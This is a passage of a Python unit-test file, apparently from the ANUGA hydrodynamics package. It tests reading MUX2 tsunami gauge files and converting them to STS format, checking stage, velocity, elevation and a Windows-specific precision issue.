#ensure that files are indeed mux2 files
times, latitudes, longitudes, elevation, stage, starttime = read_mux2_py([files[0]], weights)
ua_times, ua_latitudes, ua_longitudes, ua_elevation, xvelocity,starttime_ua=read_mux2_py([files[1]], weights)
msg='ha and ua have different gauge meta data'
assert num.allclose(times,ua_times) and num.allclose(latitudes,ua_latitudes) and num.allclose(longitudes,ua_longitudes) and num.allclose(elevation,ua_elevation) and num.allclose(starttime,starttime_ua), msg
va_times, va_latitudes, va_longitudes, va_elevation, yvelocity, starttime_va=read_mux2_py([files[2]], weights)
msg='ha and va have different gauge meta data'
assert num.allclose(times,va_times) and num.allclose(latitudes,va_latitudes) and num.allclose(longitudes,va_longitudes) and num.allclose(elevation,va_elevation) and num.allclose(starttime,starttime_va), msg
self.delete_mux(files)
msg='time array has incorrect length'
assert times.shape[0]==time_step_count,msg
msg = 'time array is incorrect'
#assert allclose(times,time_step*num.arange(1,time_step_count+1)),msg
assert num.allclose(times,time_step*num.arange(time_step_count)), msg
msg='Incorrect gauge positions returned'
for i,point in enumerate(lat_long_points):
assert num.allclose(latitudes[i],point[0]) and num.allclose(longitudes[i],point[1]),msg
msg='Incorrect gauge depths returned'
assert num.allclose(elevation,-depth),msg
msg='incorrect gauge height time series returned'
assert num.allclose(stage,ha)
msg='incorrect gauge ua time series returned'
assert num.allclose(xvelocity,ua)
msg='incorrect gauge va time series returned'
assert num.allclose(yvelocity, -va)
def test_urs2sts_read_mux2_pyII(self):
"""Spatially varing stage
"""
tide = 1
time_step_count = 3
time_step = 2
lat_long_points =[(-21.5,114.5),(-21,114.5),(-21.5,115), (-21.,115.)]
n=len(lat_long_points)
first_tstep=num.ones(n,int)
last_tstep=(time_step_count)*num.ones(n,int)
depth=20*num.ones(n,float)
ha=2*num.ones((n,time_step_count),float)
ha[0]=num.arange(0,time_step_count)+1
ha[1]=time_step_count-num.arange(1,time_step_count+1)
ha[1]=num.arange(time_step_count,2*time_step_count)
ha[2]=num.arange(2*time_step_count,3*time_step_count)
ha[3]=num.arange(3*time_step_count,4*time_step_count)
ua=5*num.ones((n,time_step_count),float)
va=-10*num.ones((n,time_step_count),float)
#-ve added to take into account mux file format where south is positive.
base_name, files = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=depth,
ha=ha,
ua=ua,
va=va)
weights=num.ones(1, float)
#ensure that files are indeed mux2 files
times, latitudes, longitudes, elevation, stage,starttime=read_mux2_py([files[0]], weights)
ua_times, ua_latitudes, ua_longitudes, ua_elevation, xvelocity,starttime_ua=read_mux2_py([files[1]], weights)
msg='ha and ua have different gauge meta data'
assert num.allclose(times,ua_times) and num.allclose(latitudes,ua_latitudes) and num.allclose(longitudes,ua_longitudes) and num.allclose(elevation,ua_elevation) and num.allclose(starttime,starttime_ua), msg
va_times, va_latitudes, va_longitudes, va_elevation, yvelocity,starttime_va=read_mux2_py([files[2]], weights)
msg='ha and va have different gauge meta data'
assert num.allclose(times,va_times) and num.allclose(latitudes,va_latitudes) and num.allclose(longitudes,va_longitudes) and num.allclose(elevation,va_elevation) and num.allclose(starttime,starttime_va), msg
self.delete_mux(files)
msg='time array has incorrect length'
#assert times.shape[0]==time_step_count,msg
msg = 'time array is incorrect'
#assert allclose(times,time_step*num.arange(1,time_step_count+1)),msg
msg='Incorrect gauge positions returned'
for i,point in enumerate(lat_long_points):
assert num.allclose(latitudes[i],point[0]) and num.allclose(longitudes[i],point[1]),msg
msg='Incorrect gauge depths returned'
assert num.allclose(elevation, -depth),msg
msg='incorrect gauge height time series returned'
assert num.allclose(stage, ha)
msg='incorrect gauge ua time series returned'
assert num.allclose(xvelocity, ua)
msg='incorrect gauge va time series returned'
assert num.allclose(yvelocity, -va) # South is positive in MUX
def test_urs2sts_read_mux2_pyIII(self):
"""Varying start and finish times
"""
tide = 1
time_step_count = 3
time_step = 2
lat_long_points =[(-21.5,114.5),(-21,114.5),(-21.5,115), (-21.,115.)]
n=len(lat_long_points)
first_tstep=num.ones(n,int)
first_tstep[0]+=1
first_tstep[2]+=1
last_tstep=(time_step_count)*num.ones(n,int)
last_tstep[0]-=1
depth=20*num.ones(n,float)
ha=2*num.ones((n,time_step_count),float)
ha[0]=num.arange(0,time_step_count)
ha[1]=num.arange(time_step_count,2*time_step_count)
ha[2]=num.arange(2*time_step_count,3*time_step_count)
ha[3]=num.arange(3*time_step_count,4*time_step_count)
ua=5*num.ones((n,time_step_count),float)
va=-10*num.ones((n,time_step_count),float)
#-ve added to take into account mux file format where south is positive.
base_name, files = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=depth,
ha=ha,
ua=ua,
va=va)
weights=num.ones(1, float)
#ensure that files are indeed mux2 files
times, latitudes, longitudes, elevation, stage, starttime=read_mux2_py([files[0]], weights)
ua_times, ua_latitudes, ua_longitudes, ua_elevation, xvelocity, starttime_ua=read_mux2_py([files[1]], weights)
msg='ha and ua have different gauge meta data'
assert num.allclose(times,ua_times) and num.allclose(latitudes,ua_latitudes) and num.allclose(longitudes,ua_longitudes) and num.allclose(elevation,ua_elevation) and num.allclose(starttime,starttime_ua), msg
va_times, va_latitudes, va_longitudes, va_elevation, yvelocity,starttime_va=read_mux2_py([files[2]], weights)
msg='ha and va have different gauge meta data'
assert num.allclose(times,va_times) and num.allclose(latitudes,va_latitudes) and num.allclose(longitudes,va_longitudes) and num.allclose(elevation,va_elevation) and num.allclose(starttime,starttime_va), msg
self.delete_mux(files)
msg='time array has incorrect length'
#assert times.shape[0]==time_step_count,msg
msg = 'time array is incorrect'
#assert allclose(times,time_step*num.arange(1,time_step_count+1)),msg
msg='Incorrect gauge positions returned'
for i,point in enumerate(lat_long_points):
assert num.allclose(latitudes[i],point[0]) and num.allclose(longitudes[i],point[1]),msg
# Set original data used to write mux file to be zero when gauges are
#not recdoring
ha[0][0]=0.0
ha[0][time_step_count-1]=0.0;
ha[2][0]=0.0;
ua[0][0]=0.0
ua[0][time_step_count-1]=0.0;
ua[2][0]=0.0;
va[0][0]=0.0
va[0][time_step_count-1]=0.0;
va[2][0]=0.0;
msg='Incorrect gauge depths returned'
assert num.allclose(elevation,-depth),msg
msg='incorrect gauge height time series returned'
assert num.allclose(stage,ha)
msg='incorrect gauge ua time series returned'
assert num.allclose(xvelocity,ua)
msg='incorrect gauge va time series returned'
assert num.allclose(yvelocity, -va) # South is positive in mux
def test_read_mux_platform_problem1(self):
"""test_read_mux_platform_problem1
This is to test a situation where read_mux returned
wrong values Win32
This test passes on Windows but test_read_mux_platform_problem2
does not
"""
from anuga.file.urs_ext import read_mux2
verbose = False
tide = 1.5
time_step_count = 10
time_step = 0.2
times_ref = num.arange(0, time_step_count*time_step, time_step)
lat_long_points = [(-21.5,114.5), (-21,114.5), (-21.5,115), (-21.,115.), (-22., 117.)]
n = len(lat_long_points)
# Create different timeseries starting and ending at different times
first_tstep=num.ones(n, int)
first_tstep[0]+=2 # Point 0 starts at 2
first_tstep[1]+=4 # Point 1 starts at 4
first_tstep[2]+=3 # Point 2 starts at 3
last_tstep=(time_step_count)*num.ones(n,int)
last_tstep[0]-=1 # Point 0 ends 1 step early
last_tstep[1]-=2 # Point 1 ends 2 steps early
last_tstep[4]-=3 # Point 4 ends 3 steps early
# Create varying elevation data (positive values for seafloor)
gauge_depth=20*num.ones(n,float)
for i in range(n):
gauge_depth[i] += i**2
# Create data to be written to first mux file
ha0=2*num.ones((n,time_step_count),float)
ha0[0]=num.arange(0,time_step_count)
ha0[1]=num.arange(time_step_count,2*time_step_count)
ha0[2]=num.arange(2*time_step_count,3*time_step_count)
ha0[3]=num.arange(3*time_step_count,4*time_step_count)
ua0=5*num.ones((n,time_step_count),float)
va0=-10*num.ones((n,time_step_count),float)
# Ensure data used to write mux file to be zero when gauges are
# not recording
for i in range(n):
# For each point
for j in list(range(0, first_tstep[i]-1)) + list(range(last_tstep[i], time_step_count)):
# For timesteps before and after recording range
ha0[i][j] = ua0[i][j] = va0[i][j] = 0.0
# Write first mux file to be combined by urs2sts
base_nameI, filesI = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=gauge_depth,
ha=ha0,
ua=ua0,
va=va0)
# Create ordering file
permutation = ensure_numeric([4,0,2])
_, ordering_filename = tempfile.mkstemp('')
order_fid = open(ordering_filename, 'w')
order_fid.write('index, longitude, latitude\n')
for index in permutation:
order_fid.write('%d, %f, %f\n' %(index,
lat_long_points[index][1],
lat_long_points[index][0]))
order_fid.close()
# -------------------------------------
# Now read files back and check values
weights = ensure_numeric([1.0])
# For each quantity read the associated list of source mux2 file with
# extention associated with that quantity
file_params=-1*num.ones(3,float) #[nsta,dt,nt]
OFFSET = 5
for j, file in enumerate(filesI):
data = read_mux2(1, [str(file).encode()], weights, file_params, permutation, verbose)
number_of_selected_stations = data.shape[0]
# Index where data ends and parameters begin
parameters_index = data.shape[1]-OFFSET
for i in range(number_of_selected_stations):
if j == 0: assert num.allclose(data[i][:parameters_index], ha0[permutation[i], :])
if j == 1: assert num.allclose(data[i][:parameters_index], ua0[permutation[i], :])
if j == 2: assert num.allclose(data[i][:parameters_index], -va0[permutation[i], :])
self.delete_mux(filesI)
def test_read_mux_platform_problem2(self):
"""test_read_mux_platform_problem2
This is to test a situation where read_mux returned
wrong values Win32
This test does not pass on Windows but test_read_mux_platform_problem1
does
"""
from anuga.file.urs_ext import read_mux2
from anuga.config import single_precision as epsilon
verbose = False
tide = 1.5
time_step_count = 10
time_step = 0.2
times_ref = num.arange(0, time_step_count*time_step, time_step)
lat_long_points = [(-21.5,114.5), (-21,114.5), (-21.5,115),
(-21.,115.), (-22., 117.)]
n = len(lat_long_points)
# Create different timeseries starting and ending at different times
first_tstep=num.ones(n,int)
first_tstep[0]+=2 # Point 0 starts at 2
first_tstep[1]+=4 # Point 1 starts at 4
first_tstep[2]+=3 # Point 2 starts at 3
last_tstep=(time_step_count)*num.ones(n,int)
last_tstep[0]-=1 # Point 0 ends 1 step early
last_tstep[1]-=2 # Point 1 ends 2 steps early
last_tstep[4]-=3 # Point 4 ends 3 steps early
# Create varying elevation data (positive values for seafloor)
gauge_depth=20*num.ones(n,float)
for i in range(n):
gauge_depth[i] += i**2
# Create data to be written to second mux file
ha1=num.ones((n,time_step_count),float)
ha1[0]=num.sin(times_ref)
ha1[1]=2*num.sin(times_ref - 3)
ha1[2]=5*num.sin(4*times_ref)
ha1[3]=num.sin(times_ref)
ha1[4]=num.sin(2*times_ref-0.7)
ua1=num.zeros((n,time_step_count),float)
ua1[0]=3*num.cos(times_ref)
ua1[1]=2*num.sin(times_ref-0.7)
ua1[2]=num.arange(3*time_step_count,4*time_step_count)
ua1[4]=2*num.ones(time_step_count)
va1=num.zeros((n,time_step_count),float)
va1[0]=2*num.cos(times_ref-0.87)
va1[1]=3*num.ones(time_step_count)
va1[3]=2*num.sin(times_ref-0.71)
# Ensure data used to write mux file to be zero when gauges are
# not recording
for i in range(n):
# For each point
for j in list(range(0, first_tstep[i]-1)) + list(range(last_tstep[i], time_step_count)):
# For timesteps before and after recording range
ha1[i][j] = ua1[i][j] = va1[i][j] = 0.0
#print 'Second station to be written to MUX'
#print 'ha', ha1[0,:]
#print 'ua', ua1[0,:]
#print 'va', va1[0,:]
# Write second mux file to be combined by urs2sts
base_nameII, filesII = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=gauge_depth,
ha=ha1,
ua=ua1,
va=va1)
# Read mux file back and verify it's correcness
####################################################
# FIXME (Ole): This is where the test should
# verify that the MUX files are correct.
#JJ: It appears as though
#that certain quantities are not being stored with enough precision
#inn muxfile or more likely that they are being cast into a
#lower precision when read in using read_mux2 Time step and q_time
# are equal but only to approx 1e-7
####################################################
#define information as it should be stored in mus2 files
points_num=len(lat_long_points)
depth=gauge_depth
ha=ha1
ua=ua1
va=va1
quantities = ['HA','UA','VA']
mux_names = [WAVEHEIGHT_MUX2_LABEL,
EAST_VELOCITY_MUX2_LABEL,
NORTH_VELOCITY_MUX2_LABEL]
quantities_init = [[],[],[]]
latlondeps = []
#irrelevant header information
ig=ilon=ilat=0
mcolat=mcolon=centerlat=centerlon=offset=az=baz=id=0.0
# urs binary is latitude fastest
for i,point in enumerate(lat_long_points):
lat = point[0]
lon = point[1]
_ , e, n = redfearn(lat, lon)
if depth is None:
this_depth = n
else:
this_depth = depth[i]
latlondeps.append([lat, lon, this_depth])
if ha is None:
this_ha = e
quantities_init[0].append(num.ones(time_step_count,float)*this_ha) # HA
else:
quantities_init[0].append(ha[i])
if ua is None:
this_ua = n
quantities_init[1].append(num.ones(time_step_count,float)*this_ua) # UA
else:
quantities_init[1].append(ua[i])
if va is None:
this_va = e
quantities_init[2].append(num.ones(time_step_count,float)*this_va) #
else:
quantities_init[2].append(va[i])
for i, q in enumerate(quantities):
#print
#print i, q
q_time = num.zeros((time_step_count, points_num), float)
quantities_init[i] = ensure_numeric(quantities_init[i])
for time in range(time_step_count):
#print i, q, time, quantities_init[i][:,time]
q_time[time,:] = quantities_init[i][:,time]
#print i, q, time, q_time[time, :]
filename = base_nameII + mux_names[i]
f = open(filename, 'rb')
assert abs(points_num-unpack('i',f.read(4))[0])<epsilon
#write mux 2 header
for latlondep in latlondeps:
assert abs(latlondep[0]-unpack('f',f.read(4))[0])<epsilon
assert abs(latlondep[1]-unpack('f',f.read(4))[0])<epsilon
assert abs(mcolat-unpack('f',f.read(4))[0])<epsilon
assert abs(mcolon-unpack('f',f.read(4))[0])<epsilon
assert abs(ig-unpack('i',f.read(4))[0])<epsilon
assert abs(ilon-unpack('i',f.read(4))[0])<epsilon
assert abs(ilat-unpack('i',f.read(4))[0])<epsilon
assert abs(latlondep[2]-unpack('f',f.read(4))[0])<epsilon
assert abs(centerlat-unpack('f',f.read(4))[0])<epsilon
assert abs(centerlon-unpack('f',f.read(4))[0])<epsilon
assert abs(offset-unpack('f',f.read(4))[0])<epsilon
assert abs(az-unpack('f',f.read(4))[0])<epsilon
assert abs(baz-unpack('f',f.read(4))[0])<epsilon
x = unpack('f', f.read(4))[0]
#print time_step
#print x
assert abs(time_step-x)<epsilon
assert abs(time_step_count-unpack('i',f.read(4))[0])<epsilon
for j in range(4): # identifier
assert abs(id-unpack('i',f.read(4))[0])<epsilon
#first_tstep=1
#last_tstep=time_step_count
for i,latlondep in enumerate(latlondeps):
assert abs(first_tstep[i]-unpack('i',f.read(4))[0])<epsilon
for i,latlondep in enumerate(latlondeps):
assert abs(last_tstep[i]-unpack('i',f.read(4))[0])<epsilon
# Find when first station starts recording
min_tstep = min(first_tstep)
# Find when all stations have stopped recording
max_tstep = max(last_tstep)
#for time in range(time_step_count):
for time in range(min_tstep-1,max_tstep):
assert abs(time*time_step-unpack('f',f.read(4))[0])<epsilon
for point_i in range(points_num):
if time+1>=first_tstep[point_i] and time+1<=last_tstep[point_i]:
x = unpack('f',f.read(4))[0]
#print time, x, q_time[time, point_i]
if q == 'VA': x = -x # South is positive in MUX
assert abs(q_time[time, point_i]-x)<epsilon
f.close()
# Create ordering file
permutation = ensure_numeric([4,0,2])
# _, ordering_filename = tempfile.mkstemp('')
# order_fid = open(ordering_filename, 'w')
# order_fid.write('index, longitude, latitude\n')
# for index in permutation:
# order_fid.write('%d, %f, %f\n' %(index,
# lat_long_points[index][1],
# lat_long_points[index][0]))
# order_fid.close()
# -------------------------------------
# Now read files back and check values
weights = ensure_numeric([1.0])
# For each quantity read the associated list of source mux2 file with
# extention associated with that quantity
file_params=-1*num.ones(3,float) # [nsta,dt,nt]
OFFSET = 5
for j, file in enumerate(filesII):
# Read stage, u, v enumerated as j
#print 'Reading', j, file
data = read_mux2(1, [str(file).encode()], weights, file_params, permutation, verbose)
#print 'Data received by Python'
#print data[1][8]
number_of_selected_stations = data.shape[0]
# Index where data ends and parameters begin
parameters_index = data.shape[1]-OFFSET
quantity=num.zeros((number_of_selected_stations, parameters_index), float)
for i in range(number_of_selected_stations):
#print i, parameters_index
#print quantity[i][:]
if j == 0: assert num.allclose(data[i][:parameters_index], ha1[permutation[i], :])
if j == 1: assert num.allclose(data[i][:parameters_index], ua1[permutation[i], :])
if j == 2:
# FIXME (Ole): This is where the output is wrong on Win32
#print
#print j, i
#print 'Input'
#print 'u', ua1[permutation[i], 8]
#print 'v', va1[permutation[i], 8]
#print 'Output'
#print 'v ', data[i][:parameters_index][8]
# South is positive in MUX
#print "data[i][:parameters_index]", data[i][:parameters_index]
#print "-va1[permutation[i], :]", -va1[permutation[i], :]
assert num.allclose(data[i][:parameters_index], -va1[permutation[i], :])
self.delete_mux(filesII)
def test_read_mux_platform_problem3(self):
# This is to test a situation where read_mux returned
# wrong values Win32
from anuga.file.urs_ext import read_mux2
from anuga.config import single_precision as epsilon
verbose = False
tide = 1.5
time_step_count = 10
time_step = 0.02
'''
Win results
time_step = 0.2000001
This is OK
'''
'''
Win results
time_step = 0.20000001
======================================================================
ERROR: test_read_mux_platform_problem3 (__main__.Test_Data_Manager)
----------------------------------------------------------------------
Traceback (most recent call last):
File "test_data_manager.py", line 6718, in test_read_mux_platform_problem3
ha1[0]=num.sin(times_ref)
ValueError: matrices are not aligned for copy
'''
'''
Win results
time_step = 0.200000001
FAIL
assert num.allclose(data[i][:parameters_index],
-va1[permutation[i], :])
'''
times_ref = num.arange(0, time_step_count*time_step, time_step)
#print "times_ref", times_ref
lat_long_points = [(-21.5,114.5), (-21,114.5), (-21.5,115),
(-21.,115.), (-22., 117.)]
stations = len(lat_long_points)
# Create different timeseries starting and ending at different times
first_tstep=num.ones(stations, int)
first_tstep[0]+=2 # Point 0 starts at 2
first_tstep[1]+=4 # Point 1 starts at 4
first_tstep[2]+=3 # Point 2 starts at 3
last_tstep=(time_step_count)*num.ones(stations, int)
last_tstep[0]-=1 # Point 0 ends 1 step early
last_tstep[1]-=2 # Point 1 ends 2 steps early
last_tstep[4]-=3 # Point 4 ends 3 steps early
# Create varying elevation data (positive values for seafloor)
gauge_depth=20*num.ones(stations, float)
for i in range(stations):
gauge_depth[i] += i**2
# Create data to be written to second mux file
ha1=num.ones((stations,time_step_count), float)
ha1[0]=num.sin(times_ref)
ha1[1]=2*num.sin(times_ref - 3)
ha1[2]=5*num.sin(4*times_ref)
ha1[3]=num.sin(times_ref)
ha1[4]=num.sin(2*times_ref-0.7)
ua1=num.zeros((stations,time_step_count),float)
ua1[0]=3*num.cos(times_ref)
ua1[1]=2*num.sin(times_ref-0.7)
ua1[2]=num.arange(3*time_step_count,4*time_step_count)
ua1[4]=2*num.ones(time_step_count)
va1=num.zeros((stations,time_step_count),float)
va1[0]=2*num.cos(times_ref-0.87)
va1[1]=3*num.ones(time_step_count)
va1[3]=2*num.sin(times_ref-0.71)
#print "va1[0]", va1[0] # The 8th element is what will go bad.
# Ensure data used to write mux file to be zero when gauges are
# not recording
for i in range(stations):
# For each point
for j in list(range(0, first_tstep[i]-1)) + list(range(last_tstep[i],
time_step_count)):
# For timesteps before and after recording range
ha1[i][j] = ua1[i][j] = va1[i][j] = 0.0
#print 'Second station to be written to MUX'
#print 'ha', ha1[0,:]
#print 'ua', ua1[0,:]
#print 'va', va1[0,:]
# Write second mux file to be combined by urs2sts
base_nameII, filesII = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=gauge_depth,
ha=ha1,
ua=ua1,
va=va1)
#print "filesII", filesII
# Read mux file back and verify it's correcness
####################################################
# FIXME (Ole): This is where the test should
# verify that the MUX files are correct.
#JJ: It appears as though
#that certain quantities are not being stored with enough precision
#inn muxfile or more likely that they are being cast into a
#lower precision when read in using read_mux2 Time step and q_time
# are equal but only to approx 1e-7
####################################################
#define information as it should be stored in mus2 files
points_num=len(lat_long_points)
depth=gauge_depth
ha=ha1
ua=ua1
va=va1
quantities = ['HA','UA','VA']
mux_names = [WAVEHEIGHT_MUX2_LABEL,
EAST_VELOCITY_MUX2_LABEL,
NORTH_VELOCITY_MUX2_LABEL]
quantities_init = [[],[],[]]
latlondeps = []
#irrelevant header information
ig=ilon=ilat=0
mcolat=mcolon=centerlat=centerlon=offset=az=baz=id=0.0
# urs binary is latitude fastest
for i,point in enumerate(lat_long_points):
lat = point[0]
lon = point[1]
_ , e, n = redfearn(lat, lon)
if depth is None:
this_depth = n
else:
this_depth = depth[i]
latlondeps.append([lat, lon, this_depth])
if ha is None:
this_ha = e
quantities_init[0].append(num.ones(time_step_count,
float)*this_ha) # HA
else:
quantities_init[0].append(ha[i])
if ua is None:
this_ua = n
quantities_init[1].append(num.ones(time_step_count,
float)*this_ua) # UA
else:
quantities_init[1].append(ua[i])
if va is None:
this_va = e
quantities_init[2].append(num.ones(time_step_count,
float)*this_va) #
else:
quantities_init[2].append(va[i])
for i, q in enumerate(quantities):
#print
#print i, q
q_time = num.zeros((time_step_count, points_num), float)
quantities_init[i] = ensure_numeric(quantities_init[i])
for time in range(time_step_count):
#print i, q, time, quantities_init[i][:,time]
q_time[time,:] = quantities_init[i][:,time]
#print i, q, time, q_time[time, :]
filename = base_nameII + mux_names[i]
f = open(filename, 'rb')
assert abs(points_num-unpack('i',f.read(4))[0])<epsilon
#write mux 2 header
for latlondep in latlondeps:
assert abs(latlondep[0]-unpack('f',f.read(4))[0])<epsilon
assert abs(latlondep[1]-unpack('f',f.read(4))[0])<epsilon
assert abs(mcolat-unpack('f',f.read(4))[0])<epsilon
assert abs(mcolon-unpack('f',f.read(4))[0])<epsilon
assert abs(ig-unpack('i',f.read(4))[0])<epsilon
assert abs(ilon-unpack('i',f.read(4))[0])<epsilon
assert abs(ilat-unpack('i',f.read(4))[0])<epsilon
assert abs(latlondep[2]-unpack('f',f.read(4))[0])<epsilon
assert abs(centerlat-unpack('f',f.read(4))[0])<epsilon
assert abs(centerlon-unpack('f',f.read(4))[0])<epsilon
assert abs(offset-unpack('f',f.read(4))[0])<epsilon
assert abs(az-unpack('f',f.read(4))[0])<epsilon
assert abs(baz-unpack('f',f.read(4))[0])<epsilon
x = unpack('f', f.read(4))[0]
#print time_step
#print x
assert abs(time_step-x)<epsilon
assert abs(time_step_count-unpack('i',f.read(4))[0])<epsilon
for j in range(4): # identifier
assert abs(id-unpack('i',f.read(4))[0])<epsilon
#first_tstep=1
#last_tstep=time_step_count
for i,latlondep in enumerate(latlondeps):
assert abs(first_tstep[i]-unpack('i',f.read(4))[0])<epsilon
for i,latlondep in enumerate(latlondeps):
assert abs(last_tstep[i]-unpack('i',f.read(4))[0])<epsilon
# Find when first station starts recording
min_tstep = min(first_tstep)
# Find when all stations have stopped recording
max_tstep = max(last_tstep)
#for time in range(time_step_count):
for time in range(min_tstep-1,max_tstep):
assert abs(time*time_step-unpack('f',f.read(4))[0])<epsilon
for point_i in range(points_num):
if time+1>=first_tstep[point_i] and time+1<=last_tstep[point_i]:
x = unpack('f',f.read(4))[0]
#print time, x, q_time[time, point_i]
if q == 'VA': x = -x # South is positive in MUX
#print q+" q_time[%d, %d] = %f" %(time, point_i,
#q_time[time, point_i])
assert abs(q_time[time, point_i]-x)<epsilon
f.close()
permutation = ensure_numeric([4,0,2])
# Create ordering file
# _, ordering_filename = tempfile.mkstemp('')
# order_fid = open(ordering_filename, 'w')
# order_fid.write('index, longitude, latitude\n')
# for index in permutation:
# order_fid.write('%d, %f, %f\n' %(index,
# lat_long_points[index][1],
# lat_long_points[index][0]))
# order_fid.close()
# -------------------------------------
# Now read files back and check values
weights = ensure_numeric([1.0])
# For each quantity read the associated list of source mux2 file with
# extention associated with that quantity
file_params=-1*num.ones(3,float) # [nsta,dt,nt]
OFFSET = 5
for j, file in enumerate(filesII):
# Read stage, u, v enumerated as j
#print 'Reading', j, file
#print "file", file
data = read_mux2(1, [str(file).encode()], weights, file_params,
permutation, verbose)
#print str(j) + "data", data
#print 'Data received by Python'
#print data[1][8]
number_of_selected_stations = data.shape[0]
#print "number_of_selected_stations", number_of_selected_stations
#print "stations", stations
# Index where data ends and parameters begin
parameters_index = data.shape[1]-OFFSET
for i in range(number_of_selected_stations):
#print i, parameters_index
if j == 0:
assert num.allclose(data[i][:parameters_index],
ha1[permutation[i], :])
if j == 1: assert num.allclose(data[i][:parameters_index], ua1[permutation[i], :])
if j == 2:
assert num.allclose(data[i][:parameters_index], -va1[permutation[i], :])
self.delete_mux(filesII)
def test_urs2sts_nonstandard_projection_reverse(self):
"""
Test that a point not in the specified zone can occur first
"""
tide=0
time_step_count = 3
time_step = 2
lat_long_points =[(-21.,113.5),(-21.,114.5),(-21.,114.), (-21.,115.)]
n=len(lat_long_points)
first_tstep=num.ones(n,int)
first_tstep[0]+=1
first_tstep[2]+=1
last_tstep=(time_step_count)*num.ones(n,int)
last_tstep[0]-=1
gauge_depth=20*num.ones(n,float)
ha=2*num.ones((n,time_step_count),float)
ha[0]=num.arange(0,time_step_count)
ha[1]=num.arange(time_step_count,2*time_step_count)
ha[2]=num.arange(2*time_step_count,3*time_step_count)
ha[3]=num.arange(3*time_step_count,4*time_step_count)
ua=5*num.ones((n,time_step_count),float)
va=-10*num.ones((n,time_step_count),float)
base_name, files = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=gauge_depth,
ha=ha,
ua=ua,
va=va)
urs2sts(base_name,
basename_out=base_name,
zone=50,
mean_stage=tide,verbose=False)
# now I want to check the sts file ...
sts_file = base_name + '.sts'
#Let's interigate the sww file
# Note, the sww info is not gridded. It is point data.
fid = NetCDFFile(sts_file)
# Make x and y absolute
x = fid.variables['x'][:]
y = fid.variables['y'][:]
geo_reference = Geo_reference(NetCDFObject=fid)
points = geo_reference.get_absolute(list(zip(x, y)))
points = ensure_numeric(points)
x = points[:,0]
y = points[:,1]
# Check that all coordinate are correctly represented
# Using the non standard projection (50)
for i in range(4):
zone, e, n = redfearn(lat_long_points[i][0], lat_long_points[i][1],
zone=50)
assert num.allclose([x[i],y[i]], [e,n])
assert zone==geo_reference.zone
self.delete_mux(files)
def test_urs2stsII(self):
"""
Test multiple sources
"""
tide=0
time_step_count = 3
time_step = 2
lat_long_points =[(-21.5,114.5),(-21,114.5),(-21.5,115), (-21.,115.)]
n=len(lat_long_points)
first_tstep=num.ones(n,int)
first_tstep[0]+=1
first_tstep[2]+=1
last_tstep=(time_step_count)*num.ones(n,int)
last_tstep[0]-=1
gauge_depth=20*num.ones(n,float)
ha=2*num.ones((n,time_step_count),float)
ha[0]=num.arange(0,time_step_count)
ha[1]=num.arange(time_step_count,2*time_step_count)
ha[2]=num.arange(2*time_step_count,3*time_step_count)
ha[3]=num.arange(3*time_step_count,4*time_step_count)
ua=5*num.ones((n,time_step_count),float)
va=-10*num.ones((n,time_step_count),float)
# Create two identical mux files to be combined by urs2sts
base_nameI, filesI = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=gauge_depth,
ha=ha,
ua=ua,
va=va)
base_nameII, filesII = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=gauge_depth,
ha=ha,
ua=ua,
va=va)
# Call urs2sts with multiple mux files
urs2sts([base_nameI, base_nameII],
basename_out=base_nameI,
weights=[1.0, 1.0],
mean_stage=tide,
verbose=False)
# now I want to check the sts file ...
sts_file = base_nameI + '.sts'
#Let's interrogate the sts file
# Note, the sts info is not gridded. It is point data.
fid = NetCDFFile(sts_file)
# Make x and y absolute
x = fid.variables['x'][:]
y = fid.variables['y'][:]
geo_reference = Geo_reference(NetCDFObject=fid)
points = geo_reference.get_absolute(list(zip(x, y)))
points = ensure_numeric(points)
x = points[:,0]
y = points[:,1]
#Check that first coordinate is correctly represented
#Work out the UTM coordinates for first point
zone, e, n = redfearn(lat_long_points[0][0], lat_long_points[0][1])
assert num.allclose([x[0],y[0]], [e,n])
#Check the time vector
times = fid.variables['time'][:]
times_actual = []
for i in range(time_step_count):
times_actual.append(time_step * i)
assert num.allclose(ensure_numeric(times),
ensure_numeric(times_actual))
#Check first value
stage = fid.variables['stage'][:]
xmomentum = fid.variables['xmomentum'][:]
ymomentum = fid.variables['ymomentum'][:]
elevation = fid.variables['elevation'][:]
# Set original data used to write mux file to be zero when gauges are
# not recdoring
ha[0][0]=0.0
ha[0][time_step_count-1]=0.0
ha[2][0]=0.0
ua[0][0]=0.0
ua[0][time_step_count-1]=0.0
ua[2][0]=0.0
va[0][0]=0.0
va[0][time_step_count-1]=0.0
va[2][0]=0.0;
# The stage stored in the .sts file should be the sum of the stage
# in the two mux2 files because both have weights = 1. In this case
# the mux2 files are the same so stage == 2.0 * ha
#print 2.0*num.transpose(ha) - stage
assert num.allclose(2.0*num.transpose(ha), stage) #Meters
#Check the momentums - ua
#momentum = velocity*(stage-elevation)
# elevation = - depth
#momentum = velocity_ua *(stage+depth)
depth=num.zeros((len(lat_long_points),time_step_count),float)
for i in range(len(lat_long_points)):
depth[i]=gauge_depth[i]+tide+2.0*ha[i]
#2.0*ha necessary because using two files with weights=1 are used
# The xmomentum stored in the .sts file should be the sum of the ua
# in the two mux2 files multiplied by the depth.
assert num.allclose(2.0*num.transpose(ua*depth), xmomentum)
#Check the momentums - va
#momentum = velocity*(stage-elevation)
# elevation = - depth
#momentum = velocity_va *(stage+depth)
# The ymomentum stored in the .sts file should be the sum of the va
# in the two mux2 files multiplied by the depth.
assert num.allclose(2.0*num.transpose(va*depth), ymomentum)
# check the elevation values.
# -ve since urs measures depth, sww meshers height,
assert num.allclose(-elevation, gauge_depth) #Meters
fid.close()
self.delete_mux(filesI)
self.delete_mux(filesII)
os.remove(sts_file)
def test_urs2sts0(self):
"""
Test single source
"""
tide=0
time_step_count = 3
time_step = 2
lat_long_points =[(-21.5,114.5),(-21,114.5),(-21.5,115), (-21.,115.)]
n=len(lat_long_points)
first_tstep=num.ones(n,int)
first_tstep[0]+=1
